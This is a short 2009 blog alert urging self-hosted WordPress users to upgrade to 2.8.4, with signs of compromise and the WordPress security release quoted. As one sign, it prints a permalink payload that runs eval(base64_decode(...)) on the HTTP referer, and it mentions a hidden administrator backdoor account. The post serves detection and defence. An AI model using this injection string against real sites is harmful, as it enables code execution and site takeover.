This is an alert for WordPress.org users running self-hosted blogs. You may be under attack!

If you’re not using WordPress 2.8.4 you’d better upgrade immediately. Or you’re gonna face a very trying weekend, according to the heads up from Mashable blog.

The Mashable blog got the warning from Lorelle on WordPress today.

According to Lorelle’s warning post there are two clues to indicate an attack:

  1. There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
  2. The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account.

Looking back:

On August 12, 2009, the WordPress blog announced the security release of WordPress 2.8.4 saying how they had fixed a vulnerability problem.

I reproduce that post here:

“Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

We fixed this problem last night and have been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now available for download and is highly recommended for all users of WordPress.”

Well, better to be safe than sorry. Upgrade to WP 2.8.4 NOW!